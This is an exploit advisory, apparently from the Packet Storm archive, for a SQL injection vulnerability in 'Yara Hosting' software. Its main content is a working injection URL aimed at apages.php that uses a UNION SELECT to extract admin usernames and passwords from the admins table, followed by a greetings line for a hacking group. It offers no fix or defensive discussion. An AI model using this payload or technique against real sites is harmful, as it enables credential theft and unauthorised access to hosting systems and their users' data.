Yara Hosting SQL Injection

2010-02-05T00:00:00
ID PACKETSTORM:85959
Type packetstorm
Reporter Meister
Modified 2010-02-05T00:00:00

Description

                                        
                                            `  
  
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
Exploit Title :yara hosting SQL injection Vulnerability  
Author: Quimo and Meister  
Software Link:  
Version: all version  
Tested on: yes  
My home : th3-0utl4ws.com<http://th3-0utl4ws.com>  
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
  
================================Exploit=============================================  
http://localhost/hosting%20yara/apages.php?pids=-66+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admins--&ids=do&ids=do  
  
=======================================================================================  
Greetz to :.MouTaz - ali - -Ghabarova and all th3-0utl4ws.com<http://th3-0utl4ws.com> Members  
  
  
  
`